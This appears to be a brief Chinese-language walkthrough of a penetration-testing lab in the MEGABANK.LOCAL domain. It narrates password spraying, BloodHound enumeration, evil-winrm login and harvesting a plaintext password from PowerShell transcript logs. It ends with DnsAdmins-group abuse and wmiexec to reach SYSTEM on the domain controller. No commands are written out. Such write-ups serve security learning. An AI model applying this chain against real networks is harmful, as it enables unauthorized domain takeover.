发现melanie账号喷洒成功,使用bloodhound.py收集域信息并分析域信息,melanie账号具有CanPSRemote权限,可以进行远程登录,使用evil-winrm登录域控
登录域控后进行信息收集,在PowerShell转录日志记录在这里面发现了MEGABANK\ryan:Serv3r4Admin4cc123!使用bloodhound进行分析下该账号,
ryan账号具有CanPSRemote权限尝试能否登录到域控,ryan账号属于CONTRACTORS@MEGABANK.LOCAL组, CONTRACTORS@MEGABANK.LOCAL组有属于DNSADMINS@MEGABANK.LOCAL的成员,
使用滥用DNS Admin组进行权限提升后通过wmiexec登录域控获得system权限。
